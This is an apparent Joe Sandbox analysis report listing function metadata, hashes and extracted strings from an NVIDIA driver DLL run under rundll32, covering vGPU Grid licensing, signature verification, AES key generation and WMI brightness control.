                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterPerformanceQuery$CounterFrequencyInit_thread_footerLeave
                                                                    • String ID: )9
                                                                    • API String ID: 2428000217-1805338887
                                                                    • Opcode ID: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
                                                                    • Instruction ID: 3d2573f3cf94dcffb505023f5a624463579426db3ea2f961382dc276a1de9ae7
                                                                    • Opcode Fuzzy Hash: 2ba064750abb0480fc47005e460bd415229348ce2235b756271b4d4ff3ee25c1
                                                                    • Instruction Fuzzy Hash: 7801923192AA42F2EA00DB24F8410A47370EB523D4F800236D26E425A1FF3CA9A98778
                                                                    Function 00007FF8A8D02E0C Relevance: 4.5, APIs: 3, Instructions: 40timeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterProcess$CurrentInit_thread_footerLeaveTimes
                                                                    • String ID:
                                                                    • API String ID: 816428697-0
                                                                    • Opcode ID: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
                                                                    • Instruction ID: e63fa713357b009c52feebf46956ab30194ea0b303b197b94da8cd94abe00052
                                                                    • Opcode Fuzzy Hash: f5dcc11f3405eaa559cfcd6a0ccef3154b8c7c602b6e6a17d5af2eea432bee2d
                                                                    • Instruction Fuzzy Hash: 5E110D71A06B42EAEB10CF64E8410A93364FB447E8F400635EA7E436A4EF3CE565C368
                                                                    Function 00007FF8A8D58344 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: enableSRS1364
                                                                    • API String ID: 1323251999-1359322883
                                                                    • Opcode ID: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
                                                                    • Instruction ID: e1be9d89d3ebb6545b66669d74ac7e057a4ad97949ff392f79eff8f41aa576e6
                                                                    • Opcode Fuzzy Hash: 01bd3773f0eb2a558a1897b6c9c6b57b574b912d968410f7a26ad8025ae356bc
                                                                    • Instruction Fuzzy Hash: 6E318E32B17A45A1EE18CB29E0902392360EB58FE4F545736DA7E077D4DF3CE46A8314
                                                                    Function 000001CEAFC78ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction ID: 2da458664882f895d24a4c5e03c32b85401c7afa55af30c21be25fca94b04bf3
                                                                    • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction Fuzzy Hash: ECE11E71418A098FE755EF14E895BE6B7F4F768380F20067BE84AC31A1DB39D245CB86
                                                                    Function 000001CEAFC9B4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 330 1ceafc9b4e0-1ceafc9b4ee 331 1ceafc9b4f0-1ceafc9b505 330->331 332 1ceafc9b523-1ceafc9b52f 330->332 331->332 334 1ceafc9b507-1ceafc9b51d call 1ceafc94ce0 RtlFreeHeap 331->334 334->332
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4536861192.000001CEAFC71000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CEAFC71000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1ceafc71000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction ID: 099121f40e541e3b6702279eadf012a57d74fd55f10622f2256a10ed4ba17106
                                                                    • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction Fuzzy Hash: 13F01C30750E089FFB58E7BAACC8BA537E2FB9C345B448055A405C7195DB38D941C741
                                                                    Function 00007FF8A8D02DEA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 340 7ff8a8d02dea-7ff8a8d02df1 341 7ff8a8d02df8-7ff8a8d02e08 call 7ff8a8d966a0 340->341
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave
                                                                    • String ID:
                                                                    • API String ID: 3960375172-0
                                                                    • Opcode ID: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
                                                                    • Instruction ID: 3f22104bd1061efcf6840a3e810c571e5bb314fa72e729f502b6fb11376ccfac
                                                                    • Opcode Fuzzy Hash: c5947d29cb0026eff81cbd50f8bf128efe6ae772932f805a0bfbed681eda9c15
                                                                    • Instruction Fuzzy Hash: 1AC04C31D2EB02F2F9009B14E8410613370EF503C4F8000B1D51D02271EF3CA1758378
                                                                    Function 00007FF8A8DDCDC0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF8A8DDCE3D,?,?,00000000,00007FF8A8DCD4E3,?,?,?,00007FF8A8DDC6EF,?,?,?,00007FF8A8DDC5E5), ref: 00007FF8A8DDCDFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
                                                                    • Instruction ID: 2408027ff5b57324578db9d0c93d9f7195c5e0c440f8d87b9e37c8a82a6359b4
                                                                    • Opcode Fuzzy Hash: 6db678ebbd684dba6e48db42fee9dfd296a3721e1ba496f89583ae119ae3c92c
                                                                    • Instruction Fuzzy Hash: 1FF08C91F4B202A2FE74277258412791584EF847E0F480634DD3E873D1EF2CA4589AB8
                                                                    Function 000001CEAFE2CA56 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000003.2086199598.000001CEAFDF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CEAFDF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_3_1ceafdf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction ID: 079f6d74a994747e646a627d660078c1ea3d4344aa2d2c018cf358a967e1ff30
                                                                    • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction Fuzzy Hash: 9401F431259A2A0FFB99E76DB8C0BE677C2F7D8330F588065D84AC72C6E924C9414280

                                                                    Non-executed Functions

                                                                    Function 00007FF8A8D746A0 Relevance: 62.0, APIs: 8, Strings: 27, Instructions: 794COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D73D70: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D73E80
                                                                    • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF8A8D74809
                                                                      • Part of subcall function 00007FF8A8D2E228: _Init_thread_footer.LIBCMT ref: 00007FF8A8D2E2EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: "auth","port":$"d_name":"$"fulfillment_class_ref_list":[$"jti":"$"lease","port":$"node_url_list":[$"scope_ref_list":[$"svc_port_set_list":[$"url":"$"url_qr":"$CLS$Could not fetch the service instance type$Could not fetch value for JWT identifier of the client configuration token$Could not fetch value for authentication server port$Could not fetch value for fulfillment class reference token$Could not fetch value for lease server port$Could not fetch value for node URL$Could not fetch value for node URL list$Could not fetch value for quick release server URL$Could not fetch value for scope reference token$Could not fetch value for server port list$Failed to extract public key$GridCommonUtils.cpp$Invalid client configuration token - signature validation failed$Scope reference token is not configured$\Program Files\NVIDIA Corporation\vGPU Licensing\TrustedStorage$readConfigsFromClientConfigToken
                                                                    • API String ID: 2214013052-1828063398
                                                                    • Opcode ID: 153c3cf1d58fa7a3b0a371835e5b5f35038c49628ef033add85e9b502cf0b756
                                                                    • Instruction ID: 24333d93c52ea742623dba88bc993c9b45eb7e675d49076f518847e3dd70de31
                                                                    • Opcode Fuzzy Hash: 153c3cf1d58fa7a3b0a371835e5b5f35038c49628ef033add85e9b502cf0b756
                                                                    • Instruction Fuzzy Hash: BA828332A0AB82A5FB11DB64E8407ED77A5FB413C8F800135DA5D53AA9EF3CD509C764
                                                                    Function 00007FF8A8D7AC00 Relevance: 60.1, APIs: 25, Strings: 9, Instructions: 621memoryencryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$AllocLocal$BinaryCryptInit_thread_footerString
                                                                    • String ID: Failed to allocate memory$Failed to compute hash on data$Failed to decode key$Failed to import public key (0x%x) - (%s)$Failed to parse key$Failed to verify signature (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$RSASHA256Verify$SHA256
                                                                    • API String ID: 2293525744-2498357658
                                                                    • Opcode ID: d8f3303b16c45953b6ca959b5d39dddd3bc90e4b27dcab49aaab03715e782f50
                                                                    • Instruction ID: 35900ab32127a13480c7fcf6719b0a2b20b66c080f7b65296aad32adde748b0c
                                                                    • Opcode Fuzzy Hash: d8f3303b16c45953b6ca959b5d39dddd3bc90e4b27dcab49aaab03715e782f50
                                                                    • Instruction Fuzzy Hash: 16620E32A0AB41EAEB10DB64E4402DE77B4FB84398F500136DA8D57B69EF3CE159CB54
                                                                    Function 00007FF8A8D4D604 Relevance: 56.9, APIs: 11, Strings: 21, Instructions: 873memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$Init$AllocString_com_issue_error$Init_thread_footer
                                                                    • String ID: ACELOG: Current NV WMI Brightness value: $ACELOG: ExecQuery failed: $ACELOG: Failed to Execute Method: $ACELOG: Failed to Get PathVariable: $ACELOG: Failed to Get Result: $ACELOG: Failed to Put Level: $ACELOG: Failed to Put inArg: $ACELOG: Failed to spawn output param instance: $ACELOG: PWM cycle value: $ACELOG: failed to get class object or method$Level$NvGetSetBrightnessLevel$NvWmiBrightness$Nvidia::UXDriver::Core::WmiBrightnessControl::GetSetBrightnessViaWmiEc$Nvidia::UXDriver::Core::WmiBrightnessControl::InitECBrightness$Result$Select * from NvWmiBrightness$WQL$WmiBrightnessControl.cpp$__PATH$inArg
                                                                    • API String ID: 4231649107-2978839865
                                                                    • Opcode ID: d5208c8926c0af4829b03ecfae45d7c4e745a46c4453201a44d50b0b1cc27df7
                                                                    • Instruction ID: 5d797905587a9a3116ef480ad3dd100fbd895377381269f96c5fb506b12063d5
                                                                    • Opcode Fuzzy Hash: d5208c8926c0af4829b03ecfae45d7c4e745a46c4453201a44d50b0b1cc27df7
                                                                    • Instruction Fuzzy Hash: E2926E36A0AB81A9EB50DF61E8401EE77B4FB487C8F500136DA9D57B58EF38D158C718
                                                                    Function 00007FF8A8D322D4 Relevance: 51.3, APIs: 12, Strings: 17, Instructions: 582stringsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Value$lstrcat$CriticalSectionWait$DeallocateEnterInit_thread_footerObjectSinglestd::_$EventLeaveMultipleObjectsReset_onexit
                                                                    • String ID: ClientConfigTokenPath$CurrentFeatureType$DCHUVen$EnableLicenseOnLogin$Exitting WaitControl()$Grid cloud license acquired$Grid cloud license state machine initialized$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::WaitControl$SOFTWARE\NVIDIA Corporation\Global\GridLicensing$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW$Service is terminating, waitForMultipleObjects returned : $Starting WaitControl()$Unable to fetch licensed feature type from registry
                                                                    • API String ID: 2378871850-2296029946
                                                                    • Opcode ID: a80dcd66cee10d92e8e31574b34c8f824a1682cf19216faf37bb6f8f5497ab6c
                                                                    • Instruction ID: b09d9b93674b9a765a0184d0ee99cf04109ef15f2fb98837e7f4acc6f6a86412
                                                                    • Opcode Fuzzy Hash: a80dcd66cee10d92e8e31574b34c8f824a1682cf19216faf37bb6f8f5497ab6c
                                                                    • Instruction Fuzzy Hash: 41621E32A0AB82E9EB10DF60E8401E937B4FB44398F500136DA5D57B69EF3CD659C768
                                                                    Function 00007FF8A8D7CEB0 Relevance: 49.5, APIs: 15, Strings: 13, Instructions: 519memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$_invalid_parameter_noinfo_noreturn$Heap$Crypt$AllocFreeLibraryProcess$AlgorithmErrorExportFormatInit_thread_footerLastLoadLocalMessageOpenPropertyProvider
                                                                    • String ID: AES$ChainingMode$ChainingModeGCM$Failed to allocate memory$Failed to export symmetric key (0x%x) - (%s)$Failed to generate key (0x%x) - (%s)$Failed to get the size of object (0x%x) - (%s)$Failed to open algorithm handle (0x%x) - (%s)$Failed to set cryptographic properties (0x%x) - (%s)$GridCloudLicensingCryptoWindows.cpp$ObjectLength$OpaqueKeyBlob$generateSymmetricKey
                                                                    • API String ID: 2962806294-91064389
                                                                    • Opcode ID: 0751dc3b6b54d79f71330d7578975599d75caf2de5ae8520f0dbc996185db319
                                                                    • Instruction ID: c0719f40c6d51645ecf7d4b4e1493563fba0e5eee26e9deb60db9e3d99de5021
                                                                    • Opcode Fuzzy Hash: 0751dc3b6b54d79f71330d7578975599d75caf2de5ae8520f0dbc996185db319
                                                                    • Instruction Fuzzy Hash: 45420E32A09B42E9EB10DB60E4406DD77B8FB44398F900136DA8D53B69EF7CE259CB54
                                                                    Function 00007FF8A8CFA83C Relevance: 44.0, APIs: 18, Strings: 7, Instructions: 209libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibraryLoadLocal$ErrorLast$FileModuleName
                                                                    • String ID: \mfpmp.exe$cryptbase.dll$cryptnet.dll$devobj.dll$drvstore.dll$msasn1.dll$wldp.dll
                                                                    • API String ID: 2075666388-3852175644
                                                                    • Opcode ID: 5b3b243193d4b28ed12cc47018abf45ed49fbc8cec7d705be69abaea25e175cb
